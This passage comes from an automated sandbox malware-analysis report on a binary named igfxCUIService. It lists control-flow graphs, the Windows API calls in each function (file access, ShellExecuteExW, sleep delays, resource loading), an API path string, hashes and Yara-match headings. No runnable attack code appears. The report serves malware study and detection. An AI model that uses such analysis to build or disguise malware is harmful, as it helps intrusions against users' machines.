270->265 275 d4aa6f-d4aa93 270->275 275->265 276 d4aa95-d4aaab 275->276 276->265 281 d4aaad-d4aaaf 276->281 283 d4ab94-d4abac ReadFile 279->283 280->279 285 d4ab33-d4ab42 GetConsoleMode 280->285 281->265 286 d4aab1-d4aad7 281->286 288 d4abae-d4abb4 283->288 289 d4ac08-d4ac13 GetLastError 283->289 285->279 291 d4ab44-d4ab48 285->291 286->265 293 d4aad9-d4aaef 286->293 288->289 298 d4abb6 288->298 296 d4ac15-d4ac27 call d41857 call d41844 289->296 297 d4ac2c-d4ac2f 289->297 292 d4ab76-d4ab80 call d468d3 290->292 291->283 299 d4ab4a-d4ab64 ReadConsoleW 291->299 292->245 293->265 301 d4aaf1-d4aaf3 293->301 294->290 295->259 296->290 308 d4ac35-d4ac37 297->308 309 d4ab6c-d4ab72 call d41821 297->309 305 d4abb9-d4abcb 298->305 306 d4ab85-d4ab8e 299->306 307 d4ab66 GetLastError 299->307 301->265 311 d4aaf5-d4ab0f 301->311 305->292 315 d4abcd-d4abd1 305->315 306->305 307->309 308->292 309->290 311->265 320 d4abd3-d4abe3 call d4a5c9 315->320 321 d4abea-d4abf5 315->321 332 d4abe6-d4abe8 320->332 322 d4abf7 call d4a720 321->322 323 d4ac01-d4ac06 call d4a3f8 321->323 330 d4abfc-d4abff 322->330 323->330 330->332 332->292
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3907804496
                                  • Opcode ID: 2ae1e096bc31375a509d90d4dc0f9dc4ec897901ac9084ff3c0bf4fc2abaf3e8
                                  • Instruction ID: ff07c534aabcc7913fc0c65387fc906e81296f056cfb7bd272cb52356e1a094d
                                  • Opcode Fuzzy Hash: 2ae1e096bc31375a509d90d4dc0f9dc4ec897901ac9084ff3c0bf4fc2abaf3e8
                                  • Instruction Fuzzy Hash: 2EC1DEB4A44349AFDF11DF9CD880BAEBBB2EF49300F084159E945AB392C7749941CB72
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Control-flow Graph

                                  control_flow_graph 333 d53f7a-d53faa call d53d56 336 d53fc5-d53fd1 call d4c8f7 333->336 337 d53fac-d53fb7 call d41844 333->337 343 d53fd3-d53fe8 call d41844 call d41857 336->343 344 d53fea-d54033 call d53cc1 336->344 342 d53fb9-d53fc0 call d41857 337->342 354 d5429f-d542a3 342->354 343->342 352 d54035-d5403e 344->352 353 d540a0-d540a9 GetFileType 344->353 356 d54075-d5409b GetLastError call d41821 352->356 357 d54040-d54044 352->357 358 d540f2-d540f5 353->358 359 d540ab-d540dc GetLastError call d41821 CloseHandle 353->359 356->342 357->356 362 d54046-d54073 call d53cc1 357->362 360 d540f7-d540fc 358->360 361 d540fe-d54104 358->361 359->342 370 d540e2-d540ed call d41857 359->370 366 d54108-d54156 call d4c842 360->366 361->366 367 d54106 361->367 362->353 362->356 376 d54175-d5419d call d53a6e 366->376 377 d54158-d54164 call d53ed0 366->377 367->366 370->342 382 d541a2-d541e3 376->382 383 d5419f-d541a0 376->383 377->376 384 d54166 377->384 386 d541e5-d541e9 382->386 387 d54204-d54212 382->387 385 d54168-d54170 call d49118 383->385 384->385 385->354 386->387 389 d541eb-d541ff 386->389 390 d5429d 387->390 391 d54218-d5421c 387->391 389->387 390->354 391->390 393 d5421e-d54251 CloseHandle call d53cc1 391->393 396 d54285-d54299 393->396 397 d54253-d5427f GetLastError call d41821 call d4ca0a 393->397 396->390 397->396
                                  APIs
                                    • Part of subcall function 00D53CC1: CreateFileW.KERNELBASE(00000000,00000000,?,00D54023,?,?,00000000,?,00D54023,00000000,0000000C), ref: 00D53CDE
                                  • GetLastError.KERNEL32 ref: 00D5408E
                                  • __dosmaperr.LIBCMT ref: 00D54095
                                  • GetFileType.KERNELBASE(00000000), ref: 00D540A1
                                  • GetLastError.KERNEL32 ref: 00D540AB
                                  • __dosmaperr.LIBCMT ref: 00D540B4
                                  • CloseHandle.KERNEL32(00000000), ref: 00D540D4
                                  • CloseHandle.KERNEL32(00000000), ref: 00D54221
                                  • GetLastError.KERNEL32 ref: 00D54253
                                  • __dosmaperr.LIBCMT ref: 00D5425A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                  • String ID: H
                                  • API String ID: 4237864984-2852464175
                                  • Opcode ID: d40d349e02439af984f955b3b15221167080bc8bee22425d5a95ac620f74c646
                                  • Instruction ID: 86a3144ec5a9bcf2390b7f218c9514e87bac7d05ae80550936704a8739e89bfa
                                  • Opcode Fuzzy Hash: d40d349e02439af984f955b3b15221167080bc8bee22425d5a95ac620f74c646
                                  • Instruction Fuzzy Hash: CCA11532A142589FCF199F6CDC91BAE3BA1EB46325F280159EC11EB3D1CB358946C772
                                  Uniqueness

                                  Uniqueness Score: 0.14%

                                  Control-flow Graph

                                  control_flow_graph 961 d19ce0-d19d5e ShellExecuteExW WaitForSingleObject 962 d19d60-d19d63 961->962 963 d19d68-d19d77 961->963 962->963 964 d19d81-d19d84 963->964 965 d19d79-d19d7c 963->965 965->964
                                  APIs
                                  • ShellExecuteExW.SHELL32(?), ref: 00D19D3A
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D19D45
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteObjectShellSingleWait
                                  • String ID: <$@
                                  • API String ID: 1289292659-1426351568
                                  • Opcode ID: 5432bd940a9541b20b370462781ba93ae44b57affc1b630c98c2caaa0701a4d2
                                  • Instruction ID: bd643f9732ae5c6f60a0cf0cccbd56833cd1e9a4bf8eb6a6c5cfb06d8b46d19d
                                  • Opcode Fuzzy Hash: 5432bd940a9541b20b370462781ba93ae44b57affc1b630c98c2caaa0701a4d2
                                  • Instruction Fuzzy Hash: A0113A71D01619ABDB00CFA8D858B8EFBB4FF49325F148359E824AA2A4DB758944CFD0
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Control-flow Graph

                                  control_flow_graph 966 d21330-d21379 967 d21380-d21383 966->967 968 d21394-d213af call d3c92f * 2 SleepEx 967->968 969 d21385-d21388 967->969 974 d213b1-d213b5 968->974 969->968 970 d2138a-d2138d 969->970 970->968 972 d2138f-d21392 970->972 972->968 972->974 974->967 977 d213b7-d213dd call d3c92f SleepEx CreateDirectoryW call d20090 974->977 981 d213e2-d21403 call d344d0 977->981
                                  APIs
                                  • SleepEx.KERNELBASE(?,00000000,F0B87680,?,?), ref: 00D213AF
                                  • SleepEx.KERNELBASE(?,00000000,?,00000000,F0B87680,?,?), ref: 00D213CD
                                  • CreateDirectoryW.KERNELBASE(00000000,?,00000000,?,00000000,F0B87680,?,?), ref: 00D213D7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep$CreateDirectory
                                  • String ID: type
                                  • API String ID: 2746843503-2363381545
                                  • Opcode ID: 980fc5c70a6c224a3fb67e0015d13486c540574b18b14ffcb9111f554b7d26c1
                                  • Instruction ID: b3689a058807341fdccfa6f591d02b92ad8fa3fe3558e2055eb3f2ce9c06be25
                                  • Opcode Fuzzy Hash: 980fc5c70a6c224a3fb67e0015d13486c540574b18b14ffcb9111f554b7d26c1
                                  • Instruction Fuzzy Hash: FD01F7B5910338ABD710AB68DC06B5BBBBDFB45B11F014125F805E76D1CB7419008AB5
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Control-flow Graph

                                  control_flow_graph 985 d21268-d2126e 986 d21270-d2127c 985->986 987 d2120b-d21223 985->987 990 d21201-d21208 call d34b47 986->990 991 d2127e-d2128c 986->991 988 d212a1-d212be call d344d0 987->988 989 d21225-d21231 987->989 994 d21233-d21241 989->994 995 d21297-d2129e call d34b47 989->995 990->987 996 d21292 991->996 997 d21323-d21379 call d41351 991->997 994->997 1001 d21247 994->1001 995->988 996->990 1006 d21380-d21383 997->1006 1001->995 1007 d21394-d213af call d3c92f * 2 SleepEx 1006->1007 1008 d21385-d21388 1006->1008 1013 d213b1-d213b5 1007->1013 1008->1007 1009 d2138a-d2138d 1008->1009 1009->1007 1011 d2138f-d21392 1009->1011 1011->1007 1011->1013 1013->1006 1016 d213b7-d21403 call d3c92f SleepEx CreateDirectoryW call d20090 call d344d0 1013->1016
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bc34073e71088ae788ee5576795708e0ea2f480fa2e3794928b1f195a737bf36
                                  • Instruction ID: a107ff7dee9df8548a2407e1bec1fdfd34367503d5980ed599cc21cca849ead6
                                  • Opcode Fuzzy Hash: bc34073e71088ae788ee5576795708e0ea2f480fa2e3794928b1f195a737bf36
                                  • Instruction Fuzzy Hash: DB418035A001289BDB18DF1CEC467AEB766EBA5315F108139F805D77C1C7389D4087B1
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Control-flow Graph

                                  control_flow_graph 1024 d49118-d4912c call d4ca9b 1027 d49132-d4913a 1024->1027 1028 d4912e-d49130 1024->1028 1030 d49145-d49148 1027->1030 1031 d4913c-d49143 1027->1031 1029 d49180-d491a0 call d4ca0a 1028->1029 1040 d491a2-d491ac call d41821 1029->1040 1041 d491ae 1029->1041 1034 d49166-d49176 call d4ca9b FindCloseChangeNotification 1030->1034 1035 d4914a-d4914e 1030->1035 1031->1030 1033 d49150-d49164 call d4ca9b * 2 1031->1033 1033->1028 1033->1034 1034->1028 1043 d49178-d4917e GetLastError 1034->1043 1035->1033 1035->1034 1045 d491b0-d491b3 1040->1045 1041->1045 1043->1029
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,00000001,?,00D49046,00000001,00D6D010,0000000C,00D490F8,00000000), ref: 00D4916E
                                  • GetLastError.KERNEL32(?,00D49046,00000001,00D6D010,0000000C,00D490F8,00000000), ref: 00D49178
                                  • __dosmaperr.LIBCMT ref: 00D491A3
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                  • String ID:
                                  • API String ID: 490808831-0
                                  • Opcode ID: dea73b2ecc90caf73fe71f481f8adde3eb8260d49aa31561ec713a64f1419efe
                                  • Instruction ID: 3f874cb4ef8d62aa9f018117b7b2059e952f0f5652d59cbe53f2c6f9a6c7c32b
                                  • Opcode Fuzzy Hash: dea73b2ecc90caf73fe71f481f8adde3eb8260d49aa31561ec713a64f1419efe
                                  • Instruction Fuzzy Hash: 6A012B32A1532917D771A77AA89F77FA78A8B82730F2D0659F908D72C1DA618C418170
                                  Uniqueness

                                  Uniqueness Score: 2.48%

                                  Control-flow Graph

                                  control_flow_graph 1049 d4be03-d4be11 GetEnvironmentStringsW 1050 d4be17-d4be26 call d4bd48 call d4690d 1049->1050 1051 d4be13-d4be15 1049->1051 1056 d4be2b-d4be31 1050->1056 1052 d4be4e-d4be52 1051->1052 1057 d4be33-d4be3b call d373d0 1056->1057 1058 d4be3e-d4be4d call d468d3 FreeEnvironmentStringsW 1056->1058 1057->1058 1058->1052
                                  APIs
                                  • GetEnvironmentStringsW.KERNEL32(?,?,00D43021), ref: 00D4BE07
                                  • _free.LIBCMT ref: 00D4BE40
                                  • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,00D43021), ref: 00D4BE47
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: EnvironmentStrings$Free_free
                                  • String ID:
                                  • API String ID: 2716640707-0
                                  • Opcode ID: a342dbd1d9b8aec40875c3e4b9f162bcef7bf1fd771cfca8917cf2d1e72af4d1
                                  • Instruction ID: 04e7100551ad2dfb564784cfd2dee6fec1ea164f5ac08c7e0c4e6f81573d0503
                                  • Opcode Fuzzy Hash: a342dbd1d9b8aec40875c3e4b9f162bcef7bf1fd771cfca8917cf2d1e72af4d1
                                  • Instruction Fuzzy Hash: 8BE09B77505B25279212223D7D4A9AF1A0ACFD2671B290336F525962C5EF65CC0641B2
                                  Uniqueness

                                  Uniqueness Score: 0.73%

                                  Control-flow Graph

                                  control_flow_graph 1063 d25750-d2575d 1064 d257be-d257cb call d273e0 1063->1064 1065 d2575f-d25775 MultiByteToWideChar 1063->1065 1065->1064 1066 d25777-d25788 1065->1066 1068 d25794-d257a8 MultiByteToWideChar 1066->1068 1069 d2578a-d25792 call d28590 1066->1069 1072 d257aa-d257bb 1068->1072 1073 d257ce-d257d8 call d13ea0 1068->1073 1069->1068
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,?,00000000,?,00D19B59,?,?), ref: 00D2576A
                                  • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,?,?,00000000,?,00D19B59,?,?), ref: 00D2579D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide
                                  • String ID:
                                  • API String ID: 626452242-0
                                  • Opcode ID: 2899bf83815a3a1050b4207c5b9c0b4f86136d3871d9f8c3b15d13aebf49cb0a
                                  • Instruction ID: 80790215f181bc7d2faea90604a15bbb227200e74667bb99e15476fd1a8a61cf
                                  • Opcode Fuzzy Hash: 2899bf83815a3a1050b4207c5b9c0b4f86136d3871d9f8c3b15d13aebf49cb0a
                                  • Instruction Fuzzy Hash: 5111E532345225AFD6209B4CEC89F6EF759EF90764F200219FA14DB3C4CA30AC0187B0
                                  Uniqueness

                                  Uniqueness Score: 0.08%

                                  Control-flow Graph

                                  control_flow_graph 1077 d1a890-d1a8ee call d140f0 1080 d1a8f4-d1a912 call d27040 1077->1080 1081 d1ad4a-d1ad4f call d13ea0 1077->1081 1089 d1a921-d1a944 call d230a0 1080->1089 1090 d1a914-d1a91c call d25750 1080->1090 1084 d1ad54-d1ad59 call d13ea0 1081->1084 1088 d1ad5e-d1ad63 call d13ea0 1084->1088 1093 d1ad68-d1ad6d call d13ea0 1088->1093 1098 d1abf7-d1ac99 call d25020 call d28500 call d23d50 call d359c3 1089->1098 1099 d1a94a 1089->1099 1090->1089 1097 d1ad72-d1ad77 call d13ea0 1093->1097 1103 d1ad7c-d1ad81 call d41351 1097->1103 1125 d1aca3-d1acad 1098->1125 1126 d1ac9b-d1ac9e 1098->1126 1102 d1a950-d1a96a call d2a510 1099->1102 1111 d1a970-d1a984 call d140f0 1102->1111 1112 d1abba-d1abc0 call d26890 1102->1112 1111->1084 1122 d1a98a-d1a9a4 call d27040 1111->1122 1116 d1abc5-d1abc7 1112->1116 1119 d1abf4 1116->1119 1120 d1abc9-d1abef call d12bd0 1116->1120 1119->1098 1120->1119 1136 d1a9a6-d1a9aa call d25750 1122->1136 1137 d1a9af-d1a9bb 1122->1137 1128 d1acdb-d1ad02 1125->1128 1129 d1acaf-d1acbb 1125->1129 1126->1125 1134 d1ad04-d1ad07 1128->1134 1135 d1ad0c-d1ad49 call d344d0 1128->1135 1131 d1acd1-d1acd8 call d34b47 1129->1131 1132 d1acbd-d1accb 1129->1132 1131->1128 1132->1103 1132->1131 1134->1135 1136->1137 1142 d1a9c8-d1a9d8 call d140f0 1137->1142 1143 d1a9bd-d1a9c6 1137->1143 1142->1088 1149 d1a9de-d1a9f4 1142->1149 1143->1142 1143->1149 1152 d1a9f6-d1a9f8 1149->1152 1153 d1a9fa-d1a9ff 1149->1153 1154 d1aa0f-d1aa34 call d272c0 1152->1154 1155 d1aa00-d1aa09 1153->1155 1159 d1aa41-d1aa51 call d140f0 1154->1159 1160 d1aa36-d1aa3f 1154->1160 1155->1155 1156 d1aa0b-d1aa0d 1155->1156 1156->1154 1159->1093 1164 d1aa57-d1aa73 1159->1164 1160->1159 1160->1164 1164->1097 1167 d1aa79-d1aa88 1164->1167 1168 d1aa96-d1aa9e 1167->1168 1169 d1aa8a-d1aa93 call d28590 1167->1169 1171 d1aaa0-d1aaa2 1168->1171 1172 d1aac4-d1aac6 1168->1172 1169->1168 1176 d1aaa4-d1aab4 call d41857 call d41341 1171->1176 1177 d1aab6-d1aabe call d373d0 1171->1177 1173 d1aac8-d1aad8 call d41857 call d41341 1172->1173 1174 d1aada-d1aadf 1172->1174 1179 d1aae2-d1aae9 1173->1179 1174->1179 1186 d1aac1 1176->1186 1177->1186 1179->1097 1183 d1aaef-d1ab06 1179->1183 1188 d1ab51-d1ab68 1183->1188 1189 d1ab08-d1ab12 1183->1189 1186->1172 1191 d1ab72-d1ab89 1188->1191 1192 d1ab6a-d1ab6d 1188->1192 1194 d1ab45-d1ab4c call d285f0 1189->1194 1195 d1ab14-d1ab18 1189->1195 1198 d1ab93-d1aba7 1191->1198 1199 d1ab8b-d1ab8e 1191->1199 1192->1191 1194->1188 1195->1194 1200 d1ab1a-d1ab30 call d28500 1195->1200 1198->1102 1201 d1abad-d1abb5 1198->1201 1199->1198 1205 d1ab32-d1ab38 1200->1205 1206 d1ab3d-d1ab43 1200->1206 1201->1102 1205->1206 1206->1188
                                  APIs
                                    • Part of subcall function 00D27040: FindResourceExW.KERNEL32(00000000,00000006,00000001,00000000,00000000,?,?,00000000,?,?,00D19B48,?,?,?,?,/api/req/res), ref: 00D27086
                                    • Part of subcall function 00D25750: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,?,00000000,?,00D19B59,?,?), ref: 00D2576A
                                    • Part of subcall function 00D25750: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,?,?,00000000,?,00D19B59,?,?), ref: 00D2579D
                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00D1AC7D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide$FindIos_base_dtorResourcestd::ios_base::_
                                  • String ID:
                                  • API String ID: 1422373393-0
                                  • Opcode ID: 964e7c0dfbaf49b402d1b882da9fc4840c6a6a4d3cd80c8aac32a198fa17010b
                                  • Instruction ID: bff8f4780150d228150d62e6b532c07b57afea51794014cabb5835f0d3f2dd55
                                  • Opcode Fuzzy Hash: 964e7c0dfbaf49b402d1b882da9fc4840c6a6a4d3cd80c8aac32a198fa17010b
                                  • Instruction Fuzzy Hash: 2DF1B070A01249DFDB14DF6CE884BADBBB1FF45314F1481A9E815AB291EB309D85CFA1
                                  Uniqueness

                                  Uniqueness Score: 1.47%

                                   Control-flow Graph (basic blocks and edges; node numbers are the graph's own)

                                   • 1207: d28810-d288f3 (calls d12bd0, d348c6, d35776, d29cb0) -> 1219, 1220
                                   • 1219: d288f5-d288f9 -> 1220
                                   • 1220: d288fd-d28904 -> 1221, 1222
                                   • 1222: d28906-d28911 (call d12bd0) -> 1221
                                   • 1221: d28916-d28927
                                  APIs
                                    • Part of subcall function 00D12BD0: ___std_exception_copy.LIBVCRUNTIME ref: 00D12C5F
                                  • std::locale::_Init.LIBCPMT ref: 00D2889B
                                    • Part of subcall function 00D35776: __EH_prolog3.LIBCMT ref: 00D3577D
                                    • Part of subcall function 00D35776: std::_Lockit::_Lockit.LIBCPMT ref: 00D35788
                                    • Part of subcall function 00D35776: std::locale::_Setgloballocale.LIBCPMT ref: 00D357A3
                                    • Part of subcall function 00D35776: _Yarn.LIBCPMT ref: 00D357B9
                                    • Part of subcall function 00D35776: std::_Lockit::~_Lockit.LIBCPMT ref: 00D357F9
                                    • Part of subcall function 00D29CB0: std::_Lockit::_Lockit.LIBCPMT ref: 00D29CF0
                                    • Part of subcall function 00D29CB0: std::_Lockit::_Lockit.LIBCPMT ref: 00D29D12
                                    • Part of subcall function 00D29CB0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D29D32
                                    • Part of subcall function 00D29CB0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D29E02
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$std::locale::_$H_prolog3InitSetgloballocaleYarn___std_exception_copy
                                  • String ID:
                                  • API String ID: 2837286730-0
                                  • Opcode ID: d19f6f3ada3d72de7840b2415c82e4d8402d84c89a5288444823ce6f29d4713c
                                  • Instruction ID: 869147ab5bd83997f9851e61729a313e12aa41cf7e5c66348b883b5529878fc0
                                  • Opcode Fuzzy Hash: d19f6f3ada3d72de7840b2415c82e4d8402d84c89a5288444823ce6f29d4713c
                                  • Instruction Fuzzy Hash: C6317CB0A00605AFE700DF64D959B5AFBF4FB44714F104629E4199BB80DBB6A968CBE0
                                  Uniqueness

                                  Uniqueness Score: 0.39%

                                   Control-flow Graph (basic blocks and edges; node numbers are the graph's own)

                                   • 1224: d48e5d-d48e83 (call d48bf2) -> 1227, 1228
                                   • 1227: d48e85-d48e97 (call d542a4) -> 1230
                                   • 1230: d48e9c-d48ea1 -> 1228, 1231
                                   • 1231: d48ea3-d48edb
                                   • 1228: d48edc-d48edf
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __wsopen_s
                                  • String ID:
                                  • API String ID: 3347428461-0
                                  • Opcode ID: 00bab20c30985b6e63b63a9b1d7fd1d4c7bc13a49a723728d534f64452207871
                                  • Instruction ID: 67fa4603c1823b38617b595d35787be4f1c992211447156d5d5315041ae842d0
                                  • Opcode Fuzzy Hash: 00bab20c30985b6e63b63a9b1d7fd1d4c7bc13a49a723728d534f64452207871
                                  • Instruction Fuzzy Hash: 27113371A0420AAFCB05DF59E94198F7BF4EF48344F0440A9F808EB311DA70EA159B64
                                  Uniqueness

                                  Uniqueness Score: 0.30%

                                   Control-flow Graph (basic blocks and edges; node numbers are the graph's own)

                                   • 1232: d4c6d1-d4c6de (call d46876) -> 1234
                                   • 1234: d4c6e3-d4c6ee -> 1235, 1236
                                   • 1235: d4c6f4-d4c6fc -> 1237, 1238
                                   • 1236: d4c6f0-d4c6f2 -> 1237
                                   • 1238: d4c6fe-d4c702 -> 1239
                                   • 1239: d4c704-d4c739 (call d49972) -> 1244
                                   • 1244: d4c73b-d4c73e -> 1237
                                   • 1237: d4c73f-d4c74b (call d468d3)
                                  APIs
                                    • Part of subcall function 00D46876: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D4710F,00000001,00000364,00000006,000000FF,?,?,?,00D4185C,00D46950), ref: 00D468B7
                                  • _free.LIBCMT ref: 00D4C740
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap_free
                                  • String ID:
                                  • API String ID: 614378929-0
                                  • Opcode ID: a30e8605a2eb8de14869478dd35ca90c301679f309bffa3130f202b4217855f8
                                  • Instruction ID: 9dc214911729c2fff4b96e95f2cc99b83e29e7b85ab856371256cc9c1a75d68e
                                  • Opcode Fuzzy Hash: a30e8605a2eb8de14869478dd35ca90c301679f309bffa3130f202b4217855f8
                                  • Instruction Fuzzy Hash: 170168B2600356ABC720CFA8C88199EFB98EB053B0F15026DF456B76C0E770AC00CBB0
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Memory Dump Source
